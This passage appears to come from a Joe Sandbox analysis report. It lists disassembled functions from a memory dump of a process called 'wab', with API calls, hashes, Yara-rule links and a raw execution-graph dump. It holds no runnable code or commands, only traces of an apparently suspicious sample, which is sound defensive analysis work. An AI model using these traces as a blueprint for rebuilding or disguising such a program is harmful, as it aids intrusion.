                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                              • String ID:
                                                              • API String ID: 2754987064-0
                                                              • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                              • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                              • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                              • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                              Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040F6E2
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                              • strlen.MSVCRT ref: 0040F70D
                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                              • String ID:
                                                              • API String ID: 2754987064-0
                                                              • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                              • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                              • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                              • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                              Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00402FD7
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                              • strlen.MSVCRT ref: 00403006
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                              • String ID:
                                                              • API String ID: 2754987064-0
                                                              • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                              • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                              • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                              • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                              Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                              • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                              • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                              • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                              • GetStockObject.GDI32(00000000), ref: 004143C6
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                              • String ID:
                                                              • API String ID: 764393265-0
                                                              • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                              • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                              • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                              • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                              Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Time$System$File$LocalSpecific
                                                              • String ID:
                                                              • API String ID: 979780441-0
                                                              • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                              • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                              • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                              • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                              Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcpy.MSVCRT ref: 004134E0
                                                              • memcpy.MSVCRT ref: 004134F2
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                              • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$DialogHandleModuleParam
                                                              • String ID:
                                                              • API String ID: 1386444988-0
                                                              • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                              • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                              • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                              • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                              Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                              • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                              • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                              • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                              Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                              • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: InvalidateMessageRectSend
                                                              • String ID: d=E
                                                              • API String ID: 909852535-3703654223
                                                              • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                              • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                              • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                              • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                              Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • wcschr.MSVCRT ref: 0040F79E
                                                              • wcschr.MSVCRT ref: 0040F7AC
                                                                • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: wcschr$memcpywcslen
                                                              • String ID: "
                                                              • API String ID: 1983396471-123907689
                                                              • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                              • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                              • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                              • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                              Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                              • _memicmp.MSVCRT ref: 0040C00D
                                                              • memcpy.MSVCRT ref: 0040C024
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FilePointer_memicmpmemcpy
                                                              • String ID: URL
                                                              • API String ID: 2108176848-3574463123
                                                              • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                              • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                              • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                              • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                              Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _snwprintfmemcpy
                                                              • String ID: %2.2X
                                                              • API String ID: 2789212964-323797159
                                                              • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                              • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                              • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                              • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                              Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _snwprintf
                                                              • String ID: %%-%d.%ds
                                                              • API String ID: 3988819677-2008345750
                                                              • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                              • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                              • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                              • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                              Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040E770
                                                              • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: MessageSendmemset
                                                              • String ID: F^@
                                                              • API String ID: 568519121-3652327722
                                                              • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                              • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                              • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                              • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                              Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: PlacementWindowmemset
                                                              • String ID: WinPos
                                                              • API String ID: 4036792311-2823255486
                                                              • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                              • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                              • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                              • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                              Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                              • wcsrchr.MSVCRT ref: 0040DCE9
                                                              • wcscat.MSVCRT ref: 0040DCFF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FileModuleNamewcscatwcsrchr
                                                              • String ID: _lng.ini
                                                              • API String ID: 383090722-1948609170
                                                              • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                              • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                              • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                              • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                              Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                              • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                              • API String ID: 2773794195-880857682
                                                              • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                              • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                              • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                              • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                              Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID:
                                                              • API String ID: 438689982-0
                                                              • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                              • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                              • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                              • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                              Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??2@$memset
                                                              • String ID:
                                                              • API String ID: 1860491036-0
                                                              • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                              • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                              • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                              • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                              Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcmp.MSVCRT ref: 00408AF3
                                                                • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                                                • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                                              • memcmp.MSVCRT ref: 00408B2B
                                                              • memcmp.MSVCRT ref: 00408B5C
                                                              • memcpy.MSVCRT ref: 00408B79
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcmp$memcpy
                                                              • String ID:
                                                              • API String ID: 231171946-0
                                                              • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                              • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                              • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                              • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                              Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: wcslen$wcscat$wcscpy
                                                              • String ID:
                                                              • API String ID: 1961120804-0
                                                              • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                              • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                              • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                              • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                              Execution Graph

                                                              Execution Coverage:2.3%
                                                              Dynamic/Decrypted Code Coverage:20.8%
                                                              Signature Coverage:0.5%
                                                              Total number of Nodes:832
                                                              Total number of Limit Nodes:16
                                                              execution_graph 33808 40fc40 70 API calls 33981 403640 21 API calls 33809 427fa4 42 API calls 33982 412e43 _endthreadex 33983 425115 76 API calls __fprintf_l 33984 43fe40 133 API calls 33812 425115 83 API calls __fprintf_l 33813 401445 memcpy memcpy DialogBoxParamA 33814 440c40 34 API calls 32939 444c4a 32958 444e38 32939->32958 32941 444c56 GetModuleHandleA 32942 444c68 __set_app_type __p__fmode __p__commode 32941->32942 32944 444cfa 32942->32944 32945 444d02 __setusermatherr 32944->32945 32946 444d0e 32944->32946 32945->32946 32959 444e22 _controlfp 32946->32959 32948 444d13 _initterm __getmainargs _initterm 32949 444d6a GetStartupInfoA 32948->32949 32951 444d9e GetModuleHandleA 32949->32951 32960 40cf44 32951->32960 32955 444dcf _cexit 32957 444e04 32955->32957 32956 444dc8 exit 32956->32955 32958->32941 32959->32948 33011 404a99 LoadLibraryA 32960->33011 32962 40cf60 32997 40cf64 32962->32997 33018 410d0e 32962->33018 32964 40cf6f 33022 40ccd7 ??2@YAPAXI 32964->33022 32966 40cf9b 33036 407cbc 32966->33036 32971 40cfc4 33054 409825 memset 32971->33054 32972 40cfd8 33059 4096f4 memset 32972->33059 32977 40d181 ??3@YAXPAX 32979 40d1b3 32977->32979 32980 40d19f DeleteObject 32977->32980 32978 407e30 _strcmpi 32981 40cfee 32978->32981 33083 407948 ??3@YAXPAX ??3@YAXPAX 32979->33083 32980->32979 32983 40cff2 RegDeleteKeyA 32981->32983 32984 40d007 EnumResourceTypesA 32981->32984 32983->32977 32986 40d047 32984->32986 32987 40d02f MessageBoxA 32984->32987 32985 40d1c4 33084 4080d4 ??3@YAXPAX 32985->33084 32989 40d0a0 CoInitialize 32986->32989 33064 40ce70 32986->33064 32987->32977 33081 40cc26 strncat memset RegisterClassA CreateWindowExA 32989->33081 32991 40d1cd 33085 407948 ??3@YAXPAX ??3@YAXPAX 32991->33085 32993 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33082 40c256 PostMessageA 32993->33082 32997->32955 32997->32956 32998 40d061 ??3@YAXPAX 32998->32979 33001 40d084 DeleteObject 32998->33001 32999 40d09e 32999->32989 33001->32979 33003 40d0f9 GetMessageA 33004 40d17b 33003->33004 33005 40d10d 33003->33005 33004->32977 33006 40d113 TranslateAccelerator 33005->33006 33008 40d145 IsDialogMessage 33005->33008 33009 40d139 IsDialogMessage 33005->33009 33006->33005 33007 40d16d GetMessageA 33006->33007 33007->33004 33007->33006 33008->33007 33010 40d157 TranslateMessage DispatchMessageA 33008->33010 33009->33007 33009->33008 33010->33007 33012 404ac4 GetProcAddress 33011->33012 33015 404ae8 33011->33015 33013 404ad4 33012->33013 33014 404add FreeLibrary 33012->33014 33013->33014 33014->33015 33016 404b13 33015->33016 33017 404afc MessageBoxA 33015->33017 33016->32962 33017->32962 33019 410d17 LoadLibraryA 33018->33019 33020 410d3c 33018->33020 33019->33020 33021 410d2b GetProcAddress 33019->33021 33020->32964 33021->33020 33023 40cd08 ??2@YAPAXI 33022->33023 33025 40cd26 33023->33025 33026 40cd2d 33023->33026 33093 404025 6 API calls 33025->33093 33028 40cd66 33026->33028 33029 40cd59 DeleteObject 33026->33029 33086 407088 33028->33086 33029->33028 33031 40cd6b 33089 4019b5 33031->33089 33034 4019b5 strncat 33035 40cdbf _mbscpy 33034->33035 33035->32966 33095 407948 ??3@YAXPAX ??3@YAXPAX 33036->33095 33038 407cf7 33041 407a1f malloc memcpy ??3@YAXPAX ??3@YAXPAX 33038->33041 33042 407ddc 33038->33042 33044 407d7a ??3@YAXPAX 33038->33044 33049 407e04 33038->33049 33099 40796e 7 API calls 33038->33099 33100 406f30 33038->33100 33041->33038 33042->33049 33108 407a1f 33042->33108 33044->33038 33096 407a55 33049->33096 33050 407e30 33051 407e57 33050->33051 33052 407e38 33050->33052 33051->32971 33051->32972 33052->33051 33053 407e41 _strcmpi 33052->33053 33053->33051 33053->33052 33114 4097ff 33054->33114 33056 409854 33119 409731 33056->33119 33060 4097ff 3 API calls 33059->33060 33061 409723 33060->33061 33139 40966c 33061->33139 33153 4023b2 33064->33153 33070 40ced3 33242 40cdda 7 API calls 33070->33242 33071 40cece 33075 40cf3f 33071->33075 33194 40c3d0 memset GetModuleFileNameA strrchr 33071->33194 33075->32998 33075->32999 33077 40ceed 33221 40affa 33077->33221 33081->32993 33082->33003 33083->32985 33084->32991 33085->32997 33094 406fc7 memset _mbscpy 33086->33094 33088 40709f CreateFontIndirectA 33088->33031 33090 4019e1 33089->33090 33091 4019c2 strncat 33090->33091 33092 4019e5 memset LoadIconA 33090->33092 33091->33090 33092->33034 33093->33026 33094->33088 33095->33038 33097 407a65 33096->33097 33098 407a5b ??3@YAXPAX 33096->33098 33097->33050 33098->33097 33099->33038 33101 406f37 malloc 33100->33101 33102 406f7d 33100->33102 33104 406f73 33101->33104 33105 406f58 33101->33105 33102->33038 33104->33038 33106 406f6c ??3@YAXPAX 33105->33106 33107 406f5c memcpy 33105->33107 33106->33104 33107->33106 33109 407a38 33108->33109 33110 407a2d ??3@YAXPAX 33108->33110 33112 406f30 3 API calls 33109->33112 33111 407a43 33110->33111 33113 40796e 7 API calls 33111->33113 33112->33111 33113->33049 33130 406f96 GetModuleFileNameA 33114->33130 33116 409805 strrchr 33117 409814 33116->33117 33118 409817 _mbscat 33116->33118 33117->33118 33118->33056 33131 44b090 33119->33131 33124 40930c 3 API calls 33125 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33124->33125 33126 4097c5 LoadStringA 33125->33126 33127 4097db 